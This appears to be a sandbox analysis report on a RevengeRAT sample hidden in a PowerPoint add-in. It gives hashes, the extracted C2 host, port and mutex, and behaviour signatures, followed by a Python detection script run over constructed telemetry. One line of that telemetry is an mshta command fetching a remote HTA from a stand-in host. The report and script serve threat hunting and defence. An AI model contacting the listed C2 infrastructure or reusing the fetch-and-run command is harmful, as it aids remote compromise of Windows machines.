General

  • Target

    bff801f54e0f5076505343aa501d584b6a83aa1694fae6f75d4ea3f1f43678de

  • Size

    22KB

  • Sample

    240719-z8lteathjh

  • MD5

    7ab5df4e9ff86b54251fa5a82f10e3d5

  • SHA1

    44371596e080a534112a921bd9bd006faad68631

  • SHA256

    bff801f54e0f5076505343aa501d584b6a83aa1694fae6f75d4ea3f1f43678de

  • SHA512

    84b2547d48d6e41618fc2743ade69e33aedfa7d3bf68c7b7e3f6f261e54ce5440d9ca01c76139f2d90accd9303d744e479a66e6678276b795fe584c87b7bd135

  • SSDEEP

    384:+7rV8Fbyfujup1bQWAodZVROecm09FJmazXB4aV5IupRKh/U4EWFuICiFQWA2M0D:cx8pSuboBRJcR5maGiCuU/ZE4uwWWrMC

Malware Config

Extracted

Family

revengerat

Botnet

NyanCatRevenge

C2

lua.ddns.com.br:5222

Mutex

101f19215cac

Targets

    • Target

      d10fccc801f58792d0feab8d9014a71f4553a584bde1f00e32586944f955d3fd.ppam

    • Size

      23KB

    • MD5

      aae8e2400a374294adcf96504f25180f

    • SHA1

      326f020fc3ec8a3bdcc27ba5d3d54df0029e6ff2

    • SHA256

      d10fccc801f58792d0feab8d9014a71f4553a584bde1f00e32586944f955d3fd

    • SHA512

      92afa4d86e30a7063f94b64e84ed99641a717b6a97888a2fbbb78b1da8662cbaedfe64b050047d8ba6cd1b542e2082b888e57077381d185e99f7f1e62e693eed

    • SSDEEP

      384:dXPNdo5nM3HC58UJzD6jHap59VcnksKLXHQxgIhSnH1xXcndqe+dQfmg:VPInM3Ih16DapOnksKjQxthGH1mdUQp

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • RevengeRAT

      Remote-access trojan with a wide range of capabilities.

    • Blocklisted process makes network request

    • Suspicious use of SetThreadContext

      Typically seen when a loader writes its payload into another process (or a suspended copy of a legitimate one) and then rewrites that process's thread context to run it, as in process hollowing.
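The extracted configuration above (C2 host and port, mutex) and the two behavioural signatures "Process spawned unexpected child process" and "Blocklisted process makes network request" translate directly into hunting logic. The following is an added example, not code from the sandbox vendor or from the report: it runs those checks over constructed process-creation and network-connection records shaped like Sysmon Event ID 1 and 3 fields. The Office host list, the child-process allowlist and the sample telemetry are assumptions; the indicator values are the ones from this report.

```python
"""Hunting helpers built from this report's indicators (added example).

Scans constructed telemetry for the behaviours the report flags: an Office
host spawning an unexpected child, a process contacting the extracted C2,
and the config mutex showing up in a handle listing."""
from dataclasses import dataclass

# Indicators taken from the extracted configuration in the report.
C2_HOST = "lua.ddns.com.br"
C2_PORT = 5222
MUTEX = "101f19215cac"

# Assumption: the .ppam add-in is hosted by PowerPoint; the other Office
# hosts are listed because the same rule applies to them.
OFFICE_HOSTS = {"powerpnt.exe", "winword.exe", "excel.exe", "outlook.exe"}
# Assumption: site-specific allowlist of children an Office host may spawn.
EXPECTED_CHILDREN = {"splwow64.exe", "werfault.exe"}


@dataclass
class ProcEvent:  # shaped like Sysmon Event ID 1 (process create)
    parent_image: str
    image: str
    command_line: str


@dataclass
class NetEvent:  # shaped like Sysmon Event ID 3 (network connect)
    image: str
    dest_host: str
    dest_port: int


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def unexpected_child(ev: ProcEvent) -> bool:
    """Office host spawned a child outside the allowlist (the report's
    'Process spawned unexpected child process' signature)."""
    return (basename(ev.parent_image) in OFFICE_HOSTS
            and basename(ev.image) not in EXPECTED_CHILDREN)


def c2_contact(ev: NetEvent) -> bool:
    """Connection to the C2 host:port from the extracted config."""
    return ev.dest_host.lower().rstrip(".") == C2_HOST and ev.dest_port == C2_PORT


def mutex_match(names) -> list:
    """Mutex names (e.g. from a handle dump) whose leaf equals the config mutex."""
    return [n for n in names if n.split("\\")[-1] == MUTEX]


def triage(proc_events, net_events, mutexes=()):
    """Return (rule, subject, detail) tuples for every hit, in input order."""
    hits = []
    for ev in proc_events:
        if unexpected_child(ev):
            hits.append(("unexpected_child", basename(ev.parent_image), basename(ev.image)))
    for ev in net_events:
        if c2_contact(ev):
            hits.append(("c2_contact", basename(ev.image), f"{ev.dest_host}:{ev.dest_port}"))
    for name in mutex_match(mutexes):
        hits.append(("mutex", name, MUTEX))
    return hits


# Constructed sample telemetry; these are NOT events from the sandbox run.
SAMPLE_PROC = [
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
              r"C:\Windows\splwow64.exe", "splwow64.exe 12288"),
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
              r"C:\Windows\System32\mshta.exe", "mshta.exe http://example.invalid/x.hta"),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]
SAMPLE_NET = [
    NetEvent(r"C:\Windows\System32\mshta.exe", "lua.ddns.com.br", 5222),
    NetEvent(r"C:\Windows\System32\svchost.exe", "update.example.invalid", 443),
]
SAMPLE_MUTEXES = [
    r"\Sessions\1\BaseNamedObjects\101f19215cac",
    r"\Sessions\1\BaseNamedObjects\SM0:1234:304:WilStaging_02",
]


def run_sample():
    return triage(SAMPLE_PROC, SAMPLE_NET, SAMPLE_MUTEXES)


if __name__ == "__main__":
    for hit in run_sample():
        print(*hit)
```

The child-process allowlist is the part that needs tuning per environment: printing helpers and crash reporters are legitimate Office children, while script hosts and LOLBins under an Office parent are the pattern the report's signature describes. The mutex check matches on the leaf name only, since the same object appears under different session prefixes in a handle dump.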

MITRE ATT&CK Enterprise v15
